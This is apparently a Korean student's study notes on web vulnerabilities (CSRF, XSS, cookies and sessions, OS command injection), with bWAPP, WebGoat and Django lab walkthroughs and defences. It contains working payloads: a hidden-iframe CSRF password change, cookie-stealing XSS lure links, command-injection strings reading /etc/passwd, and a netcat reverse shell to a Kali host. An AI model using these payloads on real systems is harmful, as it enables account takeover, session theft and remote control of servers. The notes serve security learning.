mark_safe() 함수, autoescape off 설정, safe 필터 등을 사용하는 경우 해당 기능을 무효화할 수 있으므로 유의해서 사용해야 한다.

3. CSRF(크로스 사이트 요청 위조)

요청을 전달받은 서버가 요청의 절차와 주체를 검증하지 않고 요청을 처리했을 때 발생

• 희생자의 권한으로 요청이 처리되는 문제 발생
• 자동 회원가입, 자동 글쓰기, 광고 배너 클릭 등에 악용

1) 동작 원리

만약 패스워드 변경 처리 페이지가 있을 때 아래와 같이 기능을 구현했다고 가정한다.

1. 로그인(인증) 여부 확인
   • 로그인해야만 패스워드 변경 가능
2. 처리에 필요한 사용자 입력값이 전달되었는지 확인
   • 패스워드 변경을 위한 사용자가 입력한 새 패스워드가 전달되었는지 확인
3. 처리에 필요한 시스템이 가지고 있는 값을 추출
   • 패스워드 변경을 위한 변경 대상 정보(사용자 ID)를 세션으로부터 추출
4. 요청을 처리
   • 로그인한 사용자의 패스워드를 요청 파라미터로 전달된 값으로 변경

위와 같은 기능을 구현한 회원제 게시판에 공격자가 게시글을 남긴다면 어떻게 될까?

많은 사람이 클릭할 수 있도록 유도해 제목을 정하고, 내용도 사람들이 흥미를 느끼는 내용으로 공격자가 글을 게시할 때 공격자는 게시글에 HTML 태그를 포함해 작성한다.

<iframe src="ChangePasswordProc?newpw=1234&newpwre=1234" width="0" height="0"></iframe>

iframe은 한 페이지 안에 다른 HTML 문서를 삽입할 때 사용하는 태그다. 눈에 보이면 안 되기 때문에 크기를 0으로 설정한다. 그러면 게시글은 보이지만 공격자가 추가한 태그의 문서는 보이지 않게 된다.

해당 게시물을 보는 모든 사용자의 패스워드가 1234로 변경된다.

(1) CSRF 취약점 존재

정상적인 절차를 확인하지 않고 요청을 처리해서 공격자에 의해 패스워드가 변경되는 것이다. 정상적인 절차 확인은 패스워드 변경을 원하는 사용자가 패스워드 변경을 눌러서 패스워드 변경 페이지로 들어왔는지, 공격자가 작성한 자동화된 요청인지를 확인하는 과정인데 확인하지 않았다. 

패스워드 변경이 주요 기능임에도 불구하고 인증 여부 및 요청 처리에 필요한 값 전달 여부만 확인하고 요청을 처리(사용자가 요청한 것인지 자동화된 코드가 요청한 것인지 확인하지 않고 요청을 처리)하는 문제가 있다.

2) 방어 기법

(1) 텍스트 기반의 토큰을 이용한 요청 절차 검증

1. 신청 페이지가 호출되었을 때 서버에서 임의의 값을 생성하고 세션에 저장
2. 사용자 화면에 전달
3. 서버가 가지고 있는 값과 사용자 요청을 통해서 전달된 값을 비교
   • 일치하는 경우에만 정상적인 절차를 통한 요청으로 확인하고 처리

<input type="hidden" value="abcd" />

서버에서 임의의 값을 생성하고 사용자 화면에 전달하는데. 보이지 않게 하기 위해 hidden으로 전달한다.

abcd는 텍스트 기반의 토큰으로 토큰 전달 과정에 사용자가 관여하지 않는다. 이 토큰은 사용자가 변경 신청 페이지에서 변경 신청을 요청할 때 전달되고, 변경 처리 페이지에서 값을 확인하고 처리한다. 

즉, 이 텍스트 기반의 토큰은 변경 신청 페이지에서 먼저 가지고 있고, 이 토큰을 서버에 전달하게 되는 것이다.

이때 공격자가 변경 신청 페이지를 먼저 호출해 토큰을 추출한 후 변경 처리 페이지를 호출하는 방식을 사용한다면 공격이 가능해진다.

(2) CAPTCHA

기계는 인식할 수 없으나 사람은 쉽게 인식할 수 있는 텍스트, 이미지를 통해 사람과 기계를 구별하는 프로그램

• 텍스트 기반 토큰의 자동화 처리가 가능한 문제점 해결
• 요청 과정에 사용자의 입력 추가
• 자동화된 요청을 방지하기 위한 수단
• 사용자와의 인터렉션을 통한 요청

• reCAPTCHA
  • CAPTCHA 이미지가 복잡해 사람도 이해하기 어려워지는 문제점 해결

(3) 재인증

• 패스워드 변경할 때 재인증을 위해서 현재 패스워드도 함께 입력

인증 방법

1. 지식
   • 패스워드
2. 소유
   • 주민등록증
   • 인증서
   • 스마트폰
   • OTP
3. 특징
   • 필기체 서명
   • 정맥
   • 지문
   • 홍채

생물학적 특징을 이용한 방법을 바이오 인증, 2개 이상의 이중 방법을 결합한 인증을 Multi factor 인증, 2개의 인증 방법을 결합한 인증을 Tow factor 인증이라고 한다.

4. Bee box 실습

로그인한 사용자의 패스워드를 변경을 신청하는 페이지다.

1) 개발자도구 이용 내용 분석

<h1>CSRF (Change Password)</h1>
    <p>Change your password.</p>
    <form action="/bWAPP/csrf_1.php" method="GET">

        <p><label for="password_new">New password:</label><br>
        <input type="password" id="password_new" name="password_new"></p>

        <p><label for="password_conf">Re-type new password:</label><br>
        <input type="password" id="password_conf" name="password_conf"></p>  

        <button type="submit" name="action" value="change">Change</button>   

    </form>
    <br>

새 패스워드로 1234를 입력하면 아래와 같은 형태의 요청이 발생한다.

http://bee.box/bWAPP/csrf_1.php?password_new=1234&password_conf=1234&action=change 

2) 공격 코드 삽입

위 요청이 자동으로 발생할 수 있도록 게시판에 공격 코드를 삽입한다.

Submit 후 로그아웃하고 다시 로그인 하면 원래 패스워드였던 bug로 안 되고 1234로 로그인이 가능한 것을 확인할 수 있다. 이는 csrf_1.php에서 요청 절차와 요청 주체를 확인하지 않고 전달된 파라미터에 의존해서 요청을 처리했기 때문에 발생한 문제다.

3) 취약한 코드 확인

sudo gedit /var/www/bWAPP/csrf_1.php

코드가 긴 관계로 밑에 주석과 함께 추가한다.

<?php
include("security.php");
include("security_level_check.php");
include("selections.php");
include("connect_i.php");

$message = "";

                // 요청 처리에 필요한 값이 요청 파라미터로 전달되었는지 확인
if(isset($_REQUEST["action"]) && isset($_REQUEST["password_new"]) && isset($_REQUEST["password_conf"]))
{
    $password_new = $_REQUEST["password_new"];
    $password_conf = $_REQUEST["password_conf"];

    if($password_new == "")
    {
        $message = "<font color=\"red\">Please enter a new password...</font>";       
    }
    else
    {
        if($password_new != $password_conf)
        {
            $message = "<font color=\"red\">The passwords don't match!</font>";       
        }
        else            
        {
            $login = $_SESSION["login"];  // 요청 처리에 필요한 값을 서버의 세션으로부터 추출

            $password_new = mysqli_real_escape_string($link, $password_new); // SQLi 취약점 방어
            $password_new = hash("sha1", $password_new, false);  // 패스워드를 암호화(해쉬)

            if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2") 
            {

                $sql = "UPDATE users SET password = '" . $password_new . "' WHERE login = '" . $login . "'";
                // 로그인한 사용자의 패스워드를 요청 파라미터의 값으로 변경 
                // Debugging
                // echo $sql;      

                $recordset = $link->query($sql);

                if(!$recordset)
                {
                    die("Connect Error: " . $link->error);
                }

                $message = "<font color=\"green\">The password has been changed!</font>";
            }
            else        // 보안 등급이 1 또는 2인 경우 
            {
                if(isset($_REQUEST["password_curr"])) // 현재 패스워드가 전달되었는지 확인
                {                              
                    $password_curr = $_REQUEST["password_curr"];
                    $password_curr = mysqli_real_escape_string($link, $password_curr);
                    $password_curr = hash("sha1", $password_curr, false);                

                    $sql = "SELECT password FROM users WHERE login = '" . $login . "' AND password = '" . $password_curr . "'";    
                    // 로그인한 사용자의 아이디의 패스워드가 요청 파라미터로 전달한 현재 패스워드가 일치하는 데이트를 조회
                    // Debugging
                    // echo $sql;    

                    $recordset = $link->query($sql);             

                    if(!$recordset)
                    {

                        die("Connect Error: " . $link->error);

                    }

                    // Debugging                
                    // echo "<br />Affected rows: ";                
                    // printf($link->affected_rows);

                    $row = $recordset->fetch_object();   
                    if($row)
                    {

                        // Debugging
                        // echo "<br />Row: ";
                        // print_r($row);
            // 일치하는 데이터가 존재하면 패스워드를 변경 → 재인증을 통해서 패스워드를 변경
                        $sql = "UPDATE users SET password = '" . $password_new . "' WHERE login = '" . $login . "'";

                        // Debugging
                        // echo $sql;

                        $recordset = $link->query($sql);

                        if(!$recordset)
                        {

                            die("Connect Error: " . $link->error);

                        }

                        // Debugging              
                        // echo "<br />Affected rows: ";         
                        // printf($link->affected_rows);

                        $message = "<font color=\"green\">The password has been changed!</font>";

                    }

                    else
                    {
                    // 일치하는 데이터가 없으면 오류 처리 
                        $message = "<font color=\"red\">The current password is not valid!</font>";

                    }

                }

            }

        } 

    }

}

5. Django CSRF 토큰 발행

 프레임워크에서 CSRF 토큰 발행 및 검증 처리

1) config\settings.py

MIDDLEWARE에 CSRF 항목 활성화

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',    
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

중간에 CSRF가 들어가 있는 것을 확인할 수 있다. 전역적으로 CSRF 차단 기능을 활성화하는 기능이다.

2) {% csrf_token %}

템플릿에 [% csrf_token %}을 추가함으로 차단 기능 활성화

{% extends 'base.html' %}

{% block content %}
<div class="container">
    <h5 class="my-3 border-bottom pb-2">질문 등록</h5>
    <form method="post" class="post-form my-3">
        {% csrf_token %}
        {{ form.as_p }}
        <button type="submit" class="btn btn-primary">저장하기</button>
    </form>
</div>
{% endblock %}

3) 토큰 확인

페이지를 요청할 때마다 토큰이 재발행되고 토큰값을 변경해서 요청하면 오류 발생

4) CSRF 토큰 검증 비활성화

CSRF 취약점이 발생할 수 있으므로 유의

(1) 전역적으로 CSRF 토큰 검증 비활성화

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
#   'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

(2) 부분적으로 CSRF 토큰 검증 비활성화

from django.shortcuts import render, get_object_or_404, redirect
from .models import Question
from .forms import QuestionForm
from django.utils import timezone
import subprocess
from django.views.decorators.csrf import csrf_exempt # 추가

# 함수 생략

@csrf_exempt                    # 추가
def question_create(request):
    if request.method == 'GET':
        form = QuestionForm()
        return render(request, 'pybo/question_form.html', { 'form': form })
    elif request.method == 'POST':
        # POST 방식으로 전달된 요청인 경우, 요청 본문을 통해 전달된 입력값을 저장 
        form = QuestionForm(request.POST)
        if form.is_valid():
            question = form.save(commit=False)
            question.create_date = timezone.now()
            question.save()
            return redirect('pybo:index')

views.py 함수에 @csrf_exempt 데코레이터를 추가하면 CSRF 토큰이 없거나 변조되어도 함수 처리가 가능해 지문 등록이 가능한 것을 확인할 수 있다.

공격자가 전달한 스크립트 코드가 사용자 브라우저를 통해 실행

1) 공격자가 전달한 스크립트 코드

• 사용자에게 가짜 페이지를 제공하고 입력을 유도해서 사용자 정보를 탈취
• 사용자 브라우저 또는 PC에 저장된 정보를 탈취
  • 브라우저에 설치되어 있는 각종 플러그인의 취약점 활용
• 사용자 PC의 제어권을 탈취해서 원격지에서 해당 PC를 제어
  • BeEF

2) 유형

(1) Stored XSS(저장 크로스 사이트 스크립트)

공격자가 입력한 스크립트 코드가 취약한 서버에 저장되고, 사용자가 조회 시 저장된 스크립트 코드가 그대로 사용자 브라우저로 전달되어 실행

공격자가 게시판이 글을 쓸 때 <script> alert('xss') </script>를 입력하면 저장 페이지로 전달되어 그대로 DB에 저장된다.

희생자가 게시판의 글을 조회하면 취약한 서버에 심어 놓은 스크립트 코드가 그대로 브라우저에 전달되고, 희생자 브라우저에서 실행되게 된다.

불특정 다수가 공격자가 심어 놓은 스크립트 코드가 들어있는 게시글을 볼 때마다 각자의 브라우저에서 실행되게 된다.

한 번 저장된 스크립트 코드는 다수의 사용자에게 지속해서 실행된다.

(2) Reflective XSS(반사 크로스 사이트 스크립트)

입력값이 다음 화면 출력에 사용되는 경우, 입력값에 스크립트 코드 포함 여부를 확인하지 않고 그대로 화면 출력에 사용하면 입력값으로 전달된 스크립트 코드가 사용자 브라우저에서 실행

ID 중복 체크를 할 때, abc를 입력하고 체크를 누르면 서버로 요청이 된다. 서버에서는 요청 파라미터로 전달된 ID 값 abc와 일치하는 값이 존재하는지 확인 후 반환한다.

이때, 입력자가 abc<script> alert('xss') </script> 를 입력했다면, 서버에서는 SELECT * FROM members WHERE id = 'abc <script> alert('xss') </script>'으로 일치하는 값을 찾는다. 이후 존재한다면 존재합니다. 아니면 존재 하지 않습니다. 와 같은 조회 결과를 반환한다. 결과를 반환할 때 어떤 것이 존재하는지 존재하지 않는지 알려주기 위해 서버는 입력받은 매개변수를 같이 반환한다. 즉, abc<script> alert('xss') </script>는 존재하지 않습니다. 라고, 반환하게 된다.

반환될 때 adc 옆에 있는 스크립트 코드가 사용자의 브라우저에서 실행되게 되는 것이다. 이와 같은 동작이 가능한 것을 확인한 공격자는 공격 문자열을 만들어 SMS, Email, 게시판 글쓰기 등으로 불특정 다수에게 전달할 수 있다.

XSS 취약점을 가지고 있는 페이지 주소에 스크립트가 포함된 문자열을 링크 태그로 묶어 많은 사람의 클릭을 유도하는 링크 제목으로 만들어 전달하게 된다. 예를 들어 아래와 같은 스크립트를 사용하게 된다. check.jsp는 XSS 취약점을 가지고 있는 페이지 주소를 뜻한다.

<a href="check.jsp?abc<script>alert('xss')</script>">유도 제목</a>

일반적으로 링크 주소는 단축 URL과 같은 방법을 통해서 링크 내용(주소)을 확인할 수 없도록 변형해서 전달하기 때문에 알기 쉽지 않다. 해당 링크를 클릭하면 해당 브라우저에서 링크에 숨어 있던 스크립트 코드가 실행되게 된다.

(3) DOM Based XSS

개발자가 작성한 스크립트 코드의 취약점을 이용한 공격

실습으로 알아본다.

위 경로에 html 파일을 만들고 코드를 입력한다.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Insert title here</title>
<script>
    const hash = window.location.hash.slice(1)
    if (hash) {
        window.location.href = decodeURIComponent(hash)
    }
    window.addEventListener('hashchange', function() {
        window.location.href = decodeURIComponent(window.location.hash.slice(1));
    }); 
</script>
</head>
<body>
    <h1>DOM Based XSS 공격</h1>
    <div>
        <a id="first" href="#first">First 바로가기</a>
        <a id="second" href="#second">Second 바로가기</a>        
    </div>
</body>
</html>

이 코드는 해시인데 주소 뒤에 #이 붙는 경우가 있다. # 뒤에는 id 값이 저장되는데, 같은 문서 안에서 #(3) DOM Based XSS로 된 링크가 있으면 id가 같은 값이 있는 곳으로 이동하기 때문에 책갈피 용도로 많이 사용한다.

window.location은 주소를 말하고, hash는 #을 말한다. # 다음에 나오는 글자를 slice하고 hash 변수에 넣는다.

만약 hash 변수가 있으면, 현재 주소에 hash 값을 URL decode 해서 넣는다.

addEventListerner는 이벤트를 등록하는 것이다. 사용자에게 이벤트를 받는 것이 아니고, 어떤 이벤트가 발생했을 때 그 이벤트에 대한 처리를 등록한다. 

위 코드의 주소는 http://localhost:8080/WebGoat/message.html 인데, 이 주소만 입력했을 때는 message.html 페이지가 나오는데, 주소 뒤에 http://localhost:8080/WebGoat/message.html#first와 같이 #을 입력하면 # 뒤에 나오는 글자를 추출해서 주소를 http://localhost:8080/WebGoat/first로 바꾸고 리다이렉션을 하게 된다.

이때 first 페이지가 없으면 오류가 나는 것은 정상이다. first 페이지가 있어야 이동한다.

이 코드는 개발자가 만든 스크립트 코드다. 그냥 링크를 달고 보내줘도 되는데 굳이 스크립트를 사용해서 바꿔준다.

이때, http://host.pc:8080/WebGoat/message.html#http://www.naver.com 이렇게 입력하면 자동으로 네이버로 이동하게 된다. 여기서 네이버가 아니고 아래와 같이 링크 태그로 만든다면 공격자만 만든 페이지로 이동하게 된다.

 <a href="http://host.pc:8080/WebGoat/message.html#공격자가만들어놓은페이지"> 꼭 보세요. </a>

여기서 중요한 것은 링크 주소는 누가 봐도 신뢰하고 안전한 사이트의 링크 주소로 만든다는 것이다. 링크에 마우스를 올려놓으면 링크의 주소가 나오는데 그 주소가 길면 뒤에는 잘려서 나오고 익숙한 앞 주소만 나오게 된다. 그래서 공격자가 만든 페이지를 같이 입력해도 사용자는 그 링크를 신뢰하고 안전한 사이트라고 믿고 클릭하게 되고, 그러면 신뢰한 사이트가 아니고 공격자가 만든 페이지로 이동하게 된다.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Insert title here</title>
<script>
    const hash = window.location.hash.slice(1)
    if (hash) {
        document.write("<h1>" + decodeURIComponent(hash) + "</h1>");
    } else {
        document.write("<h1>메시지가 없습니다.")
    }
</script>
</head>
<body> 
</body>
</html>

위와 같은 코드가 있을 때 주소를 입력하면 정상적으로 나온다.

하지만 공격자가 hash를 통해 출력 메시지를 바꿀 수 있다.

개발자가 만든 스크립트 코드를 통해서 공격자의 코드가 실행되는 것이다.

방어 기법

• 입력값에 브라우저에서 실행할 수 있는 코드(스크립트 코드)가 포함되어 있는지 확인
  • 오류 처리
  • 제거 후 사용
  • 안전한 문자로 대체해서 사용 - HTML 인코딩 처리
• 출력값에 의도하지 않은 실행 가능한 코드가 포함되어 있는지 확인
  • 제거 후 출력
  • 안전한 문자로 대체해서 사용 - HTML 인코딩해서 출력
• 필터링, 인코딩 작업을 수행할 때는 검증된 로직, 라이브러리, 프레임워크를 사용해서 구현
  • 사용자의 입력 패턴은 개인이 수작업으로 방어하는 것이 불가능
  • 설명

2. Cross-Site Scripting - Reflected (GET)

1) 동작 확인

입력창에 아무 글자나 쓰고 Go를 눌러 동작이 어떻게 되는지 확인한다. 

공격기법의 이름처럼 스크립트 코드를 사용해서 공격하는 것이다. 이전에 했던 SQL, Command Injection과 같이 공격한다고 생각하면 공격이 이루어지지 않는다.

2) 스크립트 코드 입력

a <script> alert('xss') </script>

First name에 위 스크립트 코드를 같이 입력해서 스크립트 코드 처리가 되어 있는지 확인할 수 있다.

Last name에는 아무 문자 또는 공백을 넣어 넘어가도 된다. 

XSS가 출력되는 것을 볼 수 있다.

a <script> alert("document.cookie") </script>

간단한 글자를 출력하는 게 아니라 쿠키를 출력하는 스크립트 코드를 입력하면 쿠키값을 얻을 수 있다.

3) 공격

쿠키가 나온 주소를 복사해서 공격 문자열을 링크로 만들어 불특정 다수에게 배포하게 되면 다른 사람의 쿠키 값을 얻을 수 있다.

<a href="http://bee.box/bWAPP/xss_get.php?firstname=first+%3Cscript%3E+alert%28document.cookie%29+%3C%2Fscript%3E%09&lastname=last&form=submit"> 비트코인 대박 정보 </a>

이렇게 만들게 되면 비트코인 대박 정보라는 이름의 링크가 생기게 되고 많은 사람들은 클릭하게 되는 것이다.

4) 실습

위 DOM Based XSS 소스 코드를 위 스크립트 공격 링크로 바꿔 실습해 봤다. 위 비트코인 대박 정보 링크를 누르면 bee box 페이지로 넘어가는데 로그인이 되어 있으면 쿠키값이 나오게 된다.

3. Cross-Site Scripting - Stored (Blog)

1) 게시판 기능

게시판 기능으로 사용자가 입력한 내용을 저장하고 조회할 수 있다.

스크립트 공격을 하기 위해서는 먼저 HTML 태그가 작동하는지 확인해야 한다.

2) HTML 태그 확인

HTML 태그가 단순한 텍스트가 아닌 HTML 태그로 해석되어 처리되는 것을 확인할 수 있다.

게시글 내용에 HTML 태그가 있어도 검증을 하지 않는다는 것을 알았다. 

그렇다면 스크립트 태그를 포함해 공격 문자를 저장하면 된다.

3) script 태그

해당 서버에 스크립트 코드가 저장되어 있으므로, 해당 페이지에 접근할 때마다 스크립트 코드가 전달되어 실행하게 된다. 이 공격도 사용자의 클릭을 유도하는 게시글에 그럴싸한 제목으로 만들어 게시한다면 불특정 다수가 피해를 보게 된다.

4. Cookie vs Session

1) Cookie 

Stateless 한 HTTP 프로토콜에서 요청과 요청 간의 관계를 유지하기 위해서 도입된 개념
추가 설명

로그인 페이지가 있다고 가정한다.

클라이언트는 ID와 PW로 서버에게 요청을 보내면 요청 본문에 포함되어 전달된다. 서버는 요청받은 파라미터로 전달된 ID와 PW를 이용해서 DB 조회를 해서 인증을 한다.

서버가 인증에 성공하면 클라이언트에게 식당 번호표를 주는 것과 비슷하다. 식당에 예약하고 번호표를 받아 차례가 되면 번호표를 들고 다시 요청하듯이 서버는 클라이언트에게 번호표와 비슷한 쿠키를 준다. 

쿠키는 서버가 주는 것이고 다음 요청에서 서버가 필요로 하는 값이다. 서버는 쿠키를 전달할 때 Set-Cookie로 응답 헤더에 담아서 전달한다. 

클라이언트는 동일한 서버로 요청할 때 브라우저가 자동으로 쿠키라는 헤더로 설정해서 그대로 전달한다. 서버는 클라이언트가 쿠키를 주고 요청하면 쿠키로 전달된 값을 이용해서 해당 사용자에게 맞는 응답을 전달한다.

(1) 안전한 쿠키 사용

• 중요 정보가 쿠키에 포함되지 않도록 한다.
  • 설계 시 중요 정보가 포함되지 않도록 지침을 만들고 지침에 따라서 개발
• 쿠키에 중요 정보가 포함되어야 하는 경우
  • 암호화해서 전달
  • 안전한 암호화 알고리즘과 키 길이를 사용, 키 관리를 안전하게 진행
  • HTTPS와 같은 보안 채널을 전달
  • Secure 속성을 활성화해서 쿠키를 전달
• 쿠키가 하드디스크에 지속해서 남아 있거나 임의로 접근하지 못 하도록 설정
  • 쿠키의 지속 시간(Max-Age)과 유효 기간(Expires)을 최소한으로 설정
  • 스크립트를 이용해서 쿠키값에 접근, 조작하는 것 방지
  • HttpOnly 속성을 활성화해서 쿠키 전달

2) Session

서버 Session에서는 다음 요청에 필요로 하는 값을 주는데 키를 발급해서 sid로 준다. 쿠키를 줄 때와는 다르게 정보 그 자차를 전달하지 않고 정보에 접근할 수 있는 키만 전달한다.

클라이언트가 동일한 서버로 요청할 때 브라우저가 자동으로 쿠키를 설정해서 전달하고 서버는 쿠키를 통해 전달된 키를 이용해서 정보에 접근하여 사용자에게 맞는 서비스를 제공한다.

• 요청, 응답 과정에서 정보 유출이 발생하지 않음
• 정보에 접근할 수 있는 키가 유출되는 경우 서버를 속여 서버에 저장된 정보에 접근이 가능
• 키를 잘 만들고 관리하는 것이 중요

(1) 세션 ID를 잘못 생성, 관리했을 때 발생할 수 있는 문제

• 세션 ID 고정
  • 인증 전과 인증 후 동일한 세션 ID를 유지하는 경우
• 세션 ID 추측
  • 세션 ID 생성 규칙을 유추할 수 있는 경우
• 세션 ID 훔치기
  • XSS 공격
  • 스크립트 코드를 이용해서 브라우저에 저장된 세션 ID를 탈취할 수 있는 경우

애플리케이션에 운영체제 명령어(= 쉘 명령어)를 실행하는 기능이 존재하는 경우, 외부 입력값을 검증, 제한하지 않고 운영체제 명령어 또는 운영체제 명령어의 일부로 사용되는 경우 발생한다. 

시스템의 제어권을 탈취해 해당 시스템을 원격에서 공격자가 마음대로 제어할 수 있게 된다.

1) 운영 체제 명령어를 실행하는 기능

(1) Java

Runtime.getRuntime().exec("쉘 명령어")

• 쉘 명령어를 해당 시스템에서 실행하고 결과를 반환

(2) PHP

exec("쉘 명령어")

• exec 설명

(3) Python

subprocess.run([쉘 명령어])
os.system("쉘 명령어")

• 명령어 설명

2) 외부 입력값 검증, 제한

(1) 검증

• 추가 명령어를 실행하는 데 사용하는 &, |, ; 등의 문자열 포함 여부를 확인하지 않고 사용

외부 입력값에 위 문자열이 있는지를 검증해야 한다.

(2) 제한

내부 로직에서 사용할 수 있는 명령어 또는 명령어의 파라미터 값을 화이트 리스트 방식으로 입력값을 제한하지 않는 경우 의도하지 않은 명령어가 전달되어 실행될 수 있다.

3) 입력값을 제한하는 방법

(1) 화이트 리스트 방식 

• 허용 목록 방식
• 사용할 수 있는 값을 미리 정의하고 정의된 범위 내의값만 사용하도록 제한
• 새로운 입력 유형에 대해서도 동일한 보안성을 제공하기 때문에 안전

일반적으로 들어올 수 있는 값이 정해져 있기 때문에 화이트 리스트 방식 사용을 권고한다. 

(2) 블랙 리스트 방식

• 제한 목록 방식
• 사용할 수 없는 값을 미리 정의하고 정의된 범위 외의 값만 사용하도록 제한
• 모집합의 규모가 크고, 변화가 심한 경우 사용

4) 외부 입력값을 운영체제 명령어로 사용하는 경우

String cmd = request.getParameter("cmd");
Runtime.getRuntim().exec(cmd);

(1) 위 코드에 대한 개발자 의도

• run.jsp?cmd=ifconfig

(2) 위 코드에 대한 공격자 조작

• run.jsp?cmd=cat /etc/passwd
• run.jsp?cmd=ifconfig & cat /etc/passwd

개발자가 의도하지 않은 명렁어 또는 추가 명령어로 계정 정보가 노출될 수 있다.

 5) 명령어의 일부로 사용하는 경우

String file = request.getParameter("file");
Runtime.getRuntim().exec("cat " + file);

(1) 위 코드에 대한 개발자 의도 

• view.jsp?file=/data/upload/myfile.txt

cat 명령어의 일부(파라미터)로 사용하여 /data/upload/ 아래에 있는 myfile.txt 내용을 반환

(2) 위 코드에 대한 공격자 조작

• view.jsp?file=/data/upload/myfile.txt & cat /etc/passwd

추가 명령어 실행을 통해서 시스템 파일 내용을 반환

6) 방어 기법

(1) 불필요한 운영체제 명령어 실행 제거

운영체제 명령어 실행이 꼭 필요한지 확인하고 불필요한 경우 해당 기능을 제거하거나 다른 기능으로 대체하고,

설계적인 측면에서는 운영체제 명령어 실행이 발생하지 않도록 설계해야 한다.

(2) 화이트 리스트 방식으로 제한

시스템 내부에서 사용할 운영체제 명령어 또는 파라미터로 사용될 값을 미리 정의하고 정의된 범위 내에서 사용하도록 제한 한다.

(3) 추가 명령어 문자 검증

입력값에 추가 명령어 실행에 사용되는 &, |, ; 등의 문자가 포함되어 있는지 검증한다.

(4) 입력값 코드화

외부에서 시스템 내부 처리를 유추할 수 없도록 입력값을 코드화해야 한다. 

String cmd = request.getParameter("cmd");

if (cmd == "CMD001") 
   Runtime.getRuntim().exec("ifconfig");

위 코드에 대한 개발자가 원했던 실행 ⇒ run.jsp?cmd=CMD001 

외부에서는 CMD001이 어떻게 쓰이는지 알 수 없도록 캡슐화, 코드화해서 작성해야 한다.

2. WebGoat 실습

Command Injection

• 목표는 C:\FullstackLAB\tools\apache-tomcat-7.0.109\conf\tomcat-users.xml 파일 내용 출력

1) 개발자 도구 사용해서 유추

지금까지 실습했던 것처럼 개발자 도구를 사용해 GET 방식으로 유추한다.

attack?Screen=6&menu=1100&HelpFile=AccessControlMatrix.help&SUBMIT=View

2) 도움말

cmd.exe /c type "C:\FullstackLAB\workspace\(경로 생략)\ AccessControlMatrix .html"

외부에서 전달되는 값을 검증, 제한하지 않으면 위 경로에 추가 명령어를 사용할 수 있다.

3) 추가 명령어

cmd.exe /c type "C:\FullstackLAB\workspace\(경로 생략)\ AccessControlMatrix .html" & type C:\FullstackLAB\tools\apache-tomcat-7.0.109\conf\tomcat-users.xml

4) Burp Suite 사용

(1) Intercept

(2) 요청 

(3) 파라미터값 변조

(4) 확인

(5) 실험

CLI에서 한 줄에 여러 실행을 하는 명령어는 & 말고 ; 도 있다. ;을 사용해 해결되는지 궁금해서 확인해 봤다.

• 위 실습과 다르게 ";을 입력 후 경로 입력

성공 메시지는 안 나오고 내용은 나오는 현상을 볼 수 있다. URL 인코딩이 안 돼 문제가 되는 것 같아 URL 인코딩 명령문으로 수정했다.

같은 결과로 성공 메시지가 없이 내용이 나온다.

• 결론

&와 ;의 차이점에 있는 것 같다. 

&는 앞 명령어의 실행 결과에 따라 뒤 명령어 실행 여부를 결정한다. 즉, 앞 명령어가 성공적으로 실행된 후에만 뒤 명령어가 실행되는 것이다. 

;은 앞 명령어의 실행 성공 여부와 관계없이 뒤 명령어를 실행한다. 

위 문제에서는 앞의 문서가 먼저 나오고 뒤 추가 명령문의 문서가 나와야 하는데 ;을 사용함으로써 앞문서 성공 여부에 관계 없어져 성공 메시지가 나오지 않은 것으로 이해했다.

5) 개발자 도구를 이용한 방법

개발자 도구를 이용해 두 번째에 있는 문서에 추가 명령어를 넣어 수정하면 아주 간단하게 해결된다.

여기서는 & ls -al, & dir, & 경로 등 시도 해봤지만, ping 하나만 해결되는 것을 볼 수 있었다.

3. Bee box 실습

bee.box에 로그인한 후 OS Command Injection에 들어간다. 

들어가면 DNS lookup이 보이는데, 검색하면 알아보기 힘들게 출력된다. 이 문제를 해결하기 위해 bee box 가상머신에서 commandi.php 파일을 수정해야 한다. 관리자 권한 실행인 sudo로 열어야 저장된다.

1) nslookup

위 두 사진은 bee.box 웹 페이지에서 검색한 결과와 bee box 터미널에서 lookup 사용한 결과를 보여준다.

두 내용을 비교해 보면 동일한 내용이 출력되는 것을 확인할 수 있다. 즉, 웹 페이지에서 사용자 입력한 값이 서버 내부에서 운영체제 명령어 실행에 사용되는 것을 추측할 수 있다. 

그렇다면 이전 실습과 같이 검색할 주소 뒤에 추가 명령어를 사용한다면 어떻게 될까?

2) 추가 명령어

추가 명령어를 실행하면 웹 페이지에서 볼 수 없는 내용까지 나온다. 이는 입력값이 서버 내부로 전달되어 사용되기까지 검증, 제한을 하지 않기 때문이다.

3) nc(netcat)을 이용한 리버스 커넥션

(1) kali 가상머신에서 특정 포트를 리스닝하는 서버를 실행

• nc -l -p 8282

(2) 웹 페이지에서 명령어 입력

• www.naver.com ; nc kali.linux 8282 -e /bin/bash

주소와 포트 번호로 연결하고, 연결에 성공하면 /bin/bash를 실행하는 명령어다.

(3) 취약한 서버로 명령어 전달

kali에서 명령어를 실행하고 있지만, pwd 명령어와 ip를 보면 bee box의 위치와 ip가 나오는 것을 확인할 수 있다.

이는 bee box 서버에서 명령어가 실행되고 출력되는 것인데, kali에서 명령어를 실행하고 출력하기 때문에 bee box 사용자는 알 수 없다.

kali가 bee box 서버 내부의 쉘 명령어를 사용하기 위해서는 ssh나 telnet으로 접속해서 쉘 명령어를 사용해야 하지만, 알 수 없는 곳으로부터 오는 것은 일반적으로는 보안 정책상 제공하지 않는다. 지정해 놓은 관리자가 있다면 관리자가 위치한 곳에서의 접속은 허용한다.

방화벽에서 인바운드에 대해서는 제약이 많은데 내부에서 외부로 나가는 것은 열려 있어야 네트워킹이 원활하게 되기 때문에 열려있는 것이 많다. 

